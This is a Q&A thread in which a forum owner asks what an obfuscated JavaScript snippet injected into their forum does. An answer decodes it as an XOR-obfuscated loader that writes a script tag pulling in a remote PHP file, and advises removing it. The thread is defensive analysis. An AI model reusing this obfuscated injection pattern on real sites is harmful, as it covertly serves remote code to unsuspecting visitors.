# Javascript encoded? var enkripsi

Tags: javascript, encryption

someone is using a weird script to bug my forum, I tracked it and found the javascript, but it's "encoded", can someone help me ?

here it is:

```
var enkripsi="'1Aqapkrv'02v
    {
    rg'1F'05vgzv-hctcqapkrv'05'02qpa'1F'05cqw,rjr'05'1G'1A-qapkrv'1G";
    teks="";
    teksasli="";
    var panjang;
    panjang=enkripsi.length;
    for(i=0;
    i<panjang;
    i++)
        {
        teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2)
    }
    teksasli=unescape(teks);
    document.write(teksasli);
```

Comment: The script that is being injected isn't really relevant to the problem (which is that something in your system allows scripts to be injected). You're looking at what someone has done after they broke in, but you need to stop them breaking in in the first place.

Answer (score 5, accepted):

It inserts the following tag into your output:

```
<script type='text/javascript' src='***.php'></script>
```

Just run the code in some JavaScript interpreter and replace the `document.write()` at the end with something like `console.log()` and you can see the output.

I guess this is some kind of worm and would suggest removing this code and the included file `***.php` from the system. Additionally check, whether this is the only modification to your code!

Comment: Thnx u I Want to vote you but I can't now because I'm new , thnx

Comment: hope you can help me in that http://stackoverflow.com/questions/11398571/remove-protect-from-html-to-make-it-work-in-another-site